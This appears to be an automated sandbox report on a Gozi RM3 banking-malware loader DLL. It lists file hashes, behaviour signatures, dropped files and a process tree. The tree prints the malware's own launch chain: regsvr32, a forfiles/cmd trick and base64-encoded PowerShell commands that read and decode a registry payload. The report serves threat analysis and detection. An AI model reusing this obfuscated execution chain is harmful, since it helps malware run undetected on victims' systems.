Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220331-en
  • submitted
    07-04-2022 14:56

General

  • Target

    crypted_loader_dll_64Donat_5.dll

  • Size

    151KB

  • MD5

    55ab2f304f8c2da30aeee7713a95064d

  • SHA1

    aae939cf3995905399e427097fc90c5b62f3d4c3

  • SHA256

    41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547

  • SHA512

    08bbf78b4154f725399055dfb8a4338ce873297af847a5e30c8b6708e44feeae071fbf7efff9ff2c0b397fdffec5ca52a9591f742092a8f50287e54ce89307d3

Score
10/10

Malware Config

Extracted

Family

gozi_rm3

Attributes
  • build

    300994

rsa_pubkey.base64
rsa_pubkey.plain

Signatures

  • Gozi RM3

    A heavily modified version of Gozi using RM3 loader.

  • Uses Tor communications 1 TTPs

    Malware can proxy its traffic through Tor for more anonymity.

  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 12 IoCs
  • Suspicious use of SetWindowsHookEx 48 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\crypted_loader_dll_64Donat_5.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2064
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\crypted_loader_dll_64Donat_5.dll
      2⤵
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2708
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:2448
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUgBvAHcAbABvACcAKQAuAE0A & exit" /p C:\Windows\system32 /s /m po*l.e*e
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3116
        • C:\Windows\system32\forfiles.exe
          forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUgBvAHcAbABvACcAKQAuAE0A & exit" /p C:\Windows\system32 /s /m po*l.e*e
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3448
          • C:\Windows\system32\cmd.exe
            /k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUgBvAHcAbABvACcAKQAuAE0A & exit
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3728
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUgBvAHcAbABvACcAKQAuAE0A
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4156
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAcgBoAGMAZQB3AGQAYQB4AGUAKQAnAA==
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1704
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAGQAZgBvAG0AaABlAGwAcwBvAGgAKQA7AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGYAbwBtAGgAZQBsAHMAbwBoACkAJwA=
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2684
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ndjxipna\ndjxipna.cmdline"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:3416
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDEA8.tmp" "c:\Users\Admin\AppData\Local\Temp\ndjxipna\CSC416600887ABE4DAFBA1C71CE45A485C3.TMP"
                  7⤵
                    PID:4356
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\con4ohii\con4ohii.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4636
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF44.tmp" "c:\Users\Admin\AppData\Local\Temp\con4ohii\CSC6EB542E7A9574AF7BAA2BEA9ABA15D7.TMP"
                    7⤵
                      PID:5000
        • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
          "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
          1⤵
            PID:3088
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            1⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3416
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3416 CREDAT:17410 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:5084
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3416 CREDAT:82950 /prefetch:2
              2⤵
              • Suspicious use of SetWindowsHookEx
              PID:3844
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            1⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1364
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1364 CREDAT:17410 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:4320
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1364 CREDAT:17414 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2108
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1364 CREDAT:82948 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:3816
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1364 CREDAT:17418 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:228
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1364 CREDAT:82952 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:4464
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1364 CREDAT:17422 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:4228
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1364 CREDAT:17424 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2996
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1364 CREDAT:17426 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:5064
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1364 CREDAT:82960 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:4972
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1364 CREDAT:82962 /prefetch:2
              2⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:4912

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

            Filesize

            717B

            MD5

            54e9306f95f32e50ccd58af19753d929

            SHA1

            eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

            SHA256

            45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

            SHA512

            8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

            Filesize

            192B

            MD5

            18e6999a2a4f4d33ef9ca213ddce3f90

            SHA1

            ceb17f475fdf0e1597edeefeea8004b8911bca33

            SHA256

            f6746942b9218dc6963d5d12c00038e4682d0a2c5eda7c0c6f3cad2700a4761f

            SHA512

            6222b1d9fcb116fbb23c849bf9efe7ae2011d38accb173705b1c0fb34d8cb496244fae807bc4a013aeabc35205556d62256793f3e7d410efb3759b6dcc041e57

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\4ecg0mv\imagestore.dat

            Filesize

            430B

            MD5

            152bc434783543b5b700141ec1b11a90

            SHA1

            eab6ff4daefd192ff50ada365a583ab78e924360

            SHA256

            db3313fabf0a887175ab0fca5d8c4c11f3cef23e19ab1e3f479ad7e763d56126

            SHA512

            ec326d4cd8b60b0c5528d3a272650893c727abbb7cce10ace71c0eeff27a0c00d821ee6b6fe907ba2dad87a76dc9f745a07d5db1a93f8a847633d90da5206742

          • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\4ecg0mv\imagestore.dat

            Filesize

            430B

            MD5

            fd57195bb3e3463f0787902f8bbd154b

            SHA1

            dfb7f941c53a4fdbe3daf3cc78e12f4745bcd7f2

            SHA256

            abcd06a9347139aa5e13726131a1e3bfa6043f19f1c425dbc119e5195c29a9ba

            SHA512

            6c568f1a5c0a54177f967ff781977764943ddf48e9467ee983a66cfd3d808b404a1d793a87177cac5b4e1e805743ca7cadb4cb50843901e7ef9b5bc3973a370f

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8E73FL5R\favicon[1].ico

            Filesize

            318B

            MD5

            a976d227e5d1dcf62f5f7e623211dd1b

            SHA1

            a2a9dc1abdd3d888484678663928cb024c359ee6

            SHA256

            66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271

            SHA512

            6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            64B

            MD5

            235a8eb126d835efb2e253459ab8b089

            SHA1

            293fbf68e6726a5a230c3a42624c01899e35a89f

            SHA256

            5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

            SHA512

            a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            104B

            MD5

            6548c638f8687e5f5a291f803afbb35a

            SHA1

            1f6731dee35979a22007d2b4d249e928084ba8bf

            SHA256

            a831e5959fc89f5ccab46c063ffb9f17e6d4d6c1d324810364aaa2103b99ff46

            SHA512

            2faf8e4392cbed14bd308d2f6b5797b9202ca2feda13f84cd0cf64c9cc299060a17d6f73ea67bd77e736aa7c54a9678b3379d7cb9898f30f723c247fae559b35

          • C:\Users\Admin\AppData\Local\Temp\RESDEA8.tmp

            Filesize

            1KB

            MD5

            abe30e977cfeab62c44ba9b71c7e8243

            SHA1

            8182e35c93e9af2357eee665c1b215d7f04bafc8

            SHA256

            2bdfec7c6a7fb2daa86727fc61c93f86ad3ccfaceff03ee4c5fc5c11f7eb1797

            SHA512

            f2741e48eb2a0b776a447f3068a91d21fe0fe0bc9b534dc11faa4c884a02714dd2d87c12312a763953cd289e2a8189d6cc97ae4ffad1d90a22834dc112e3153b

          • C:\Users\Admin\AppData\Local\Temp\RESDF44.tmp

            Filesize

            1KB

            MD5

            9893b46a07e756b59f078f9c69cfa2d5

            SHA1

            c6efaaa88d14a29867c33e45fca666b1849828bd

            SHA256

            ba3ac615213c90876ca99cf5eec8820cdbb7f8916983165a0aa5881a224796e1

            SHA512

            991718b8746ff5e10f03f04c8a07292afc93fea2d091870c60d1565dee1da1c7686bb51f2e0e20357375a9a6db1ca85d7f40371d6f40e383d1fd12f871a57a82

          • C:\Users\Admin\AppData\Local\Temp\con4ohii\con4ohii.dll

            Filesize

            3KB

            MD5

            0e32d8ab34455b8d1f9c92dab35c774c

            SHA1

            d3028658c4f75a70da6eb48b1c2ed93bd43cdbb7

            SHA256

            b7745d3689aee844f861e9bf1795ade95a805ba57b0838ff1ee245824429a6a7

            SHA512

            bb144cf63361b8627d1149f2d1f8814d63acd4b3e30bbd4982fea7bf843eff41d3567245487d1e7be7cfc6427f29bb4f6745ca5c76ed2ab52fb9789c11e4c7b6

          • C:\Users\Admin\AppData\Local\Temp\ndjxipna\ndjxipna.dll

            Filesize

            3KB

            MD5

            d248a120751db03bea8f58037ab29d2e

            SHA1

            bb42f68f6ef6dd19f377eb46bc428af83617fabc

            SHA256

            b20a45fa6fcdbe3b567320677189622817562ab1afb3ab4570e14a6e5accd56e

            SHA512

            3ebff83d9bca0f7c91c9d3c3ae1c8700300c39a331684e50e9651e7824486bf3f757cb02ab1c2cb7fa6cec1f23f1976c2b53cbfa83cb863501cfe59efee41780

          • \??\c:\Users\Admin\AppData\Local\Temp\con4ohii\CSC6EB542E7A9574AF7BAA2BEA9ABA15D7.TMP

            Filesize

            652B

            MD5

            747f1957a688c35133d8baf8f4a40144

            SHA1

            72bf3b2759edef7e219c33e1bbf1223bfe3ef791

            SHA256

            282060c43e977d148367bd3ffe48504f8f8ceda012bab5572c0deb83b914c01a

            SHA512

            70ca6171b769a3d0a53a348fcce57b6116056880c1f65e2bb53b12c7dd350b84b8d68e5e108d8dd8af007d978db6027fde25372b0d5b2a0df6ba730f762ee13c

          • \??\c:\Users\Admin\AppData\Local\Temp\con4ohii\con4ohii.0.cs

            Filesize

            416B

            MD5

            e991aa9d35bfffc8f1e0d5dcf4c95ed1

            SHA1

            02d81b5b8cfd7b25d4fa0dab40d6ce6db3129501

            SHA256

            2598df56dcfc916eb9ae7b571c67d2feb92740843e36caccf9df705c03145265

            SHA512

            e0205253f43832674a3ea5dbe376e82fe0a59722ca10bed0184ff8fa298111957437db32aefb725b8c525f62aa8c7bc14922fa665ec9ced0d465d91837da126b

          • \??\c:\Users\Admin\AppData\Local\Temp\con4ohii\con4ohii.cmdline

            Filesize

            369B

            MD5

            de9465906310005055f7c4847633a4a2

            SHA1

            85db6d2f985728e05e7cea597ea68efbe7c2c4d1

            SHA256

            1bfed0bb1b5ca9bc0c1830d5a005369ca7fedf6748d49308a035df87adf30c67

            SHA512

            97049ea3fb0f29be2d0f8680bd3ff688904c6e4911cb9a8b2e2f3d8c482335e475836236677438f1b1cc317ddeacdbb5b7a221ab730f03a516bdfff1ecad7945

          • \??\c:\Users\Admin\AppData\Local\Temp\ndjxipna\CSC416600887ABE4DAFBA1C71CE45A485C3.TMP

            Filesize

            652B

            MD5

            21dc5414f23d70c8feb0ba0f11d56398

            SHA1

            08b6404fd87c13950161c22d02be812bdf4ed21e

            SHA256

            8892d75c31385c11a5e15e16c17e3a02e54714f2133bbda6b174e89aa7a90d37

            SHA512

            148b20c71d4afe6a566232409a9c455b16023cc91da65d476e62329b47825cdda318149b6ad98755ce86b4c0c31812967e34fef1f42bfe4071c27e5d00695c39

          • \??\c:\Users\Admin\AppData\Local\Temp\ndjxipna\ndjxipna.0.cs

            Filesize

            417B

            MD5

            cdc42ce046de74fa8cb97234640cfcc5

            SHA1

            8a6aa5bda682fbb11bc974d752408593aec799cc

            SHA256

            7fca4a3b3889149b375ce11cd1614298a244c05e3dd5fa343be56986aaa675c5

            SHA512

            c2663ca8817dc7a375c06cfc4adb529ab61b098663a550feba5dabe8b9c6269a5e878419d5198cb463b9c6b4d5acb504587ffd5721eab568068a7e9d45d55d13

          • \??\c:\Users\Admin\AppData\Local\Temp\ndjxipna\ndjxipna.cmdline

            Filesize

            369B

            MD5

            c67d88c373b28003df54d2acf57d9ed8

            SHA1

            93a95e78ad6e3897260b1017c00160965d6e00bf

            SHA256

            c288e90ec64232ecae5edc0ed43606fa11a7556240cbc0dad5a0af62df88830f

            SHA512

            fd4ae2d78e464f9eab41840271bf2112bd12615cd8f77e8f2ead8fda02d96f4f5ef115ef009474950361fcf0125b74af0327457fc5704dca77e30f8901e50b71

          • memory/1704-151-0x00007FF94A0A0000-0x00007FF94AB61000-memory.dmp

            Filesize

            10.8MB

          • memory/2684-154-0x00007FF94A0A0000-0x00007FF94AB61000-memory.dmp

            Filesize

            10.8MB

          • memory/2708-171-0x0000000000E00000-0x0000000000E0E000-memory.dmp

            Filesize

            56KB

          • memory/2708-125-0x0000000010000000-0x000000001000F000-memory.dmp

            Filesize

            60KB

          • memory/2708-130-0x0000000001120000-0x0000000001130000-memory.dmp

            Filesize

            64KB

          • memory/4156-148-0x000002ABD9780000-0x000002ABD9790000-memory.dmp

            Filesize

            64KB

          • memory/4156-144-0x000002ABDB130000-0x000002ABDB152000-memory.dmp

            Filesize

            136KB

          • memory/4156-145-0x00007FF94A0A0000-0x00007FF94AB61000-memory.dmp

            Filesize

            10.8MB

          • memory/4156-146-0x000002ABD9780000-0x000002ABD9790000-memory.dmp

            Filesize

            64KB

          • memory/4156-169-0x000002ABF5890000-0x000002ABF58A3000-memory.dmp

            Filesize

            76KB

          • memory/4156-147-0x000002ABD9780000-0x000002ABD9790000-memory.dmp

            Filesize

            64KB